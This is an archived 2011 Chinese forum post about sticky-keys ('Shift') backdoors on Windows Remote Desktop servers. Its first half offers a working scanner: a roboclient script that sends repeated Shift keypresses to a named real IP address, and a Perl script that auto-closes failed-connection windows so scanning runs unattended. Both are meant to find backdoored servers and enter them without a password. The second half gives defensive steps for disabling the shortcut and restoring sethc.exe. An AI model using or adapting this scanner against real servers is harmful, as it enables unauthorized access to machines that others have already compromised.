3389远程终端的SHIFT后门自动扫描[自动关闭错误连接]

洪平水 發表於 2011-1-15 23:03:17

3389远程终端的SHIFT后门自动扫描[自动关闭错误连接]

首先3389的SHIFT后门极少 其次大部分SHIFT后门都加密 所以手工一个一个尝试是挺傻的，写成自动扫描的话，还能让人忍受 需要用到的工具 roboclient smclient -f:shift_backdoor.txt -s:125.91.15.254 -l:1 -v -d shift_backdoor.txt： job { connect("","","",1,1); sleep(2000); senddata("WM_KEYDOWN",16,2752513); senddata("WM_KEYUP",16,3223977985); senddata("WM_KEYDOWN",16,2752513); senddata("WM_KEYUP",16,3223977985); senddata("WM_KEYDOWN",16,2752513); senddata("WM_KEYUP",16,3223977985); senddata("WM_KEYDOWN",16,2752513); senddata("WM_KEYUP",16,3223977985); senddata("WM_KEYDOWN",16,2752513); senddata("WM_KEYUP",16,3223977985); sleep(2000); disconnect(); } 有些SHIFT后门被改成了按7次SHIFT，或者是WIN+U后门，改改shift_backdoor.txt把功能加进去即可 自动关闭错误连接 <div class="msgheader"><div class="right">复制代码</div>代码如下:</div><div class="msgborder" id="phpcode5"> #!/usr/bin/perl use warnings; use Win32::GUI; use constant WM_CLOSE => 16; sub monitor { my $handle = Win32::GUI::FindWindow('', '中断远程桌面连接'); Win32::GUI::SendMessage($handle, WM_CLOSE, 0, 0); } sub monitor1 { my $handle = Win32::GUI::FindWindow('', '断开 Windows 会话'); Win32::GUI::SendMessage($handle, WM_CLOSE, 0, 0); } while(1){ &monitor; &monitor1; sleep(2); } </div> shift后门的解决办法 一日在网上看到了shift后门，说是按5下shift键服务器的系统盘就蹦出来了，不用输入密码！我一看，就怀着好奇的想法试了下果真如此，难怪我们的服务器总是出问题，查了下解决办法现在发出来，希望和我一样的菜鸟X级网管能有用。 打开控制面板－－辅助功能选项－－粘滞键－－设置－－去掉使用快捷键的勾 还有要改下copy.exe的权限，不过在这里推荐大家把c盘所有的程序都改下，只有administrator才能访问 shift后门的预防解决办法：预防很简单的，连敲5次shift，然后在弹出的设置里面取消连滞键 已经中了的话 attrib c:\windows\system32\sethc.exe -h attrib c:\windows\system32\dllcache\sethc.exe -h 拷贝新的 c:\windows\system32\sethc.exe 文件到 c:\windows\system32\目录下；拷贝新的c:\windows\system32\dllcache\sethc.exe到c:\windows\system32\dllcache\目录下 收工！

頁: [1]

琼殿技术论坛's Archiver

3389远程终端的SHIFT后门自动扫描[自动关闭错误连接]